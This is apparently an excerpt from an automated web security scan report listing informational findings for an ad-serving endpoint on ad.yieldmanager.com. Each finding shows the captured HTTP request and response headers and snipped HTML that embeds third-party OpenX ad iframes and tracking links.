GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB7T3u9D-fRCuVYsJLcmii2o8-2nEmtcR5AVBdkAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D222434046%26r%3D0%26s%3D2126909,24816474-ed57-11e0-9072-8bf8886ba59e,1317601935151 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:32:15 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0104.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:32:15 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601935_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlT9tugzAM.RreUJSEcFO0h9AMCQ3aVWKrxguiIRS2QlhgKuvXLxtVf2CWZZ9jHR.LyKECu00jXVwRSEjohRQ5WPgOhsgPbUgp9REmAcE-sackqhlHMGGbg.D27C94yJ9WZCoP2D5Z2XPAwIUDQJTOLuvoMwv
...[SNIP]...
ey40X3lr-4xe0ls.9g2-08j5bDLBybrMGsq1ouQI1yWIBQvRlWjQZja0Sxlo2WU2s5nEALe1c1yK42zHPRLxdHg7thknoudTXUqi-Hr.4oddlKLY3grIRR.AANinGt,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601935_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601935_HERE" border="0" alt=""></a>
...[SNIP]...
19.34. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1u5EQ2uTRCu0UK0wRgb-CaV4hxgLNJw6Nl0NcAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3531193473%26r%3D0%26s%3D2126909,d3a1a59c-ed55-11e0-80e9-78e7d1fa054a,1317601369970 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:22:50 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0398.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:22:50 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601369_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlT2FrgzAQ.TV-k5CYaFNkH2KDRdaUFexK-0U0ibOrNS51VPz1y2bpH9hx3L13vHvHIRzTSpFSlQjjqtKkDmOEA7kIlhGk2odxHBNIcUDCBYr8W5YoxhHM2Oogox37C77krzNylVO2y2b2Rhm4cwCIseI-j74
...[SNIP]...
GHUyP4Hh4fL7n9F99vhqH3MPOC1KUCgy2VHoHpdTcCaa5uWNYW9I0TpVbXVt8aD3MCvSCaTKfPyrEoRL9cVg6fu5u2Q2HLTplr0X1fK22LRlvtBK2RTvEDRHdzgA==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601369_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601369_HERE" border="0" alt=""></a>
...[SNIP]...
19.35. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD3IppGOHRCvytEI8IlhY4YuVtqVubfpfOsASXAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3247825203%26r%3D0%26s%3D2126909,9649f674-ed53-11e0-9d4a-78e7d1627226,1317600408061 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0366.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:06:48 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600408_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljN9qgzAUxp.GOwmJiU6RXcSmgqzKOmRlvZGYpLPzT1x01PbpF2bpC-xwOOf3Hb7zIRxLHwvsEYKklIEIVIywJ54QrwmvXRjHMY6CCEGM3SlLJGUIZnSzFcGe.hWL2MtKdrKQ7vWqXkMKLgwAok1-WU.feQg
...[SNIP]...
Py41rcsmtxz7H.z67bzPPoYOp4qW0JZsOlWoAe1bAAoXt75CcDxsaaUqNORk2NgxmBjhfc9KDO0qrAh5HVorZ8HiZl5srwQeq-Gn76WpmqUUZZQ6eFdfwC4zVziQ==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600408_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600408_HERE" border="0" alt=""></a>
...[SNIP]...
19.36. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0WTa2AuXRCieUQeM9xzS9SB587kV8jBmWTv.vAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D4263695032%26r%3D0%26s%3D2126909,eb9b69d0-ed55-11e0-a9d4-2b61e222f209,1317601410194 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:30 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0040.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:23:30 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601410_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlT9tugzAM.RreUJQAhVRoD6GIKVspQ-qKtBfEJQxoISywwfr180bVH5hl2eccHdsyMV1Kjaq0BHYKSnIoLjGNwjG2lciojl3XNR1sOcTemI4-cq9kPsGc7ZLCjtlf-Fv.eUVQfcpivrIXytDsI2RJFc6r9BF
...[SNIP]...
cWeMu.31o-R7eXYP5B1-tpGjSTaUYAWaJJZaVYkBxEv6BCdiBmlUJDDaZAiUqJsdZM38KaYV9lL5oSmL0hv7zIATf9KNSUqqwvZZf2n10uVFoLJcBwkQU4fgCHOnQo,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601410_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601410_HERE" border="0" alt=""></a>
...[SNIP]...
19.37. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgiwPjv-TRCkUrG2tPS4QLgIW4rcFUOBhq5qJ-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D89638094%26r%3D0%26s%3D2126909,c3a62f3c-ed55-11e0-8f4e-ef2e6bb84476,1317601343156 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:22:23 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0158.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:22:23 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601343_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljFFrgzAUhX-NbxKiiS4ie9BmDtmUOuyGfRFr4qxT42JGnb9-oZb-gV3CzTmH7x4L-VZVE46gh3DFHdcjvoXs-sEmDWGeCX3fR9jCBDoQOeYchyygFoyD3VPtZsF1qEdfNqU3JUEmNrcnAbhQALCQyWWLvhM
...[SNIP]...
CwiyHGKc1QeuvR94-m2So1GSgw7Eg.BpSsGF-AmPi4gFoMOqwaCaZWQ5HkjeRzayCKoWG7qxj5mWnnOtDTvj5pfR5nLlUpq5GJoRx.hhOXZcsl10Avak38AeZOc5Q=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601343_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601343_HERE" border="0" alt=""></a>
...[SNIP]...
19.38. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABu84XmYOXRCq3LuWilirRExGOCBbppsM4h7aUmAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D651889297%26r%3D0%26s%3D2126909,23b7d376-ed56-11e0-8688-78e7d1615726,1317601504333 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:25:04 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0337.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:25:04 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601504_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlTNtqhDAQ.RrfJCQx6wXpg24qSFfpQuhiX0STuO5FY6NF69c31GV.oMMwc86ZMwc5IZE4gAI1tefwnfB5iBzMPVy7Qvg2DMMQu4SgAAUetsc0FhFFMI32r9w9Rn9FA.q2ITOpHx3Vxt79CMwUAKJ0Nm.SV-b
...[SNIP]...
LJzJ0VS874T.7IMf8vtt1O02A5kYUT0wJMuhJyAWqQ.QK46oxYNRoMrTElWjZajq3lUAIt7K6qlxdhmLuDgeG8NvjSj1JPpa56obqy.-5qqctWamkMd8WN4xfoDHSN,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601504_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601504_HERE" border="0" alt=""></a>
...[SNIP]...
19.39. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcdk.eEuHRCgjbCw3l4ZsDyHtFcdoBQGnEFw5IAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3193310181%26r%3D0%26s%3D2126909,931f07c8-ed53-11e0-b50e-78e7d15f8c76,1317600402746 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:43 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0383.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:06:43 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600402_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTdtqhDAQ.RrfJCReUkX6EDdYpBu3C7LSvojGWMVLbLQofn3TuuwPdBhmzjmcOYPswOYl5h6qXcxL4WIYINviT6goUOmZMAgCx.IdjDDyfHOOw4pQBGNyyji-kr-iPn09kJ7UI9f4YG8eASsFwJGKrYf0xTz
...[SNIP]...
1Lb8PlhdnJPUffP5tmsyyTYRPDinRXYFFFJTYgJzFugMtBi0WtwNRoU6RErcTcGDZ1oGHhXY6irTTDLvrlvNS4HWehllwVYyWHfPweSqHyRiihDb3k2vEDNMZzfg==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600402_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600402_HERE" border="0" alt=""></a>
...[SNIP]...
19.40. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAk1mcSHObRCux3vD.Z2QE2l6xnaDo.l2KWVEm5AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D890798733%26r%3D0%26s%3D2126909,93f40a2e-ed56-11e0-81d6-78e7d162bfa0,1317601692632 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:28:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0190.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:28:13 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

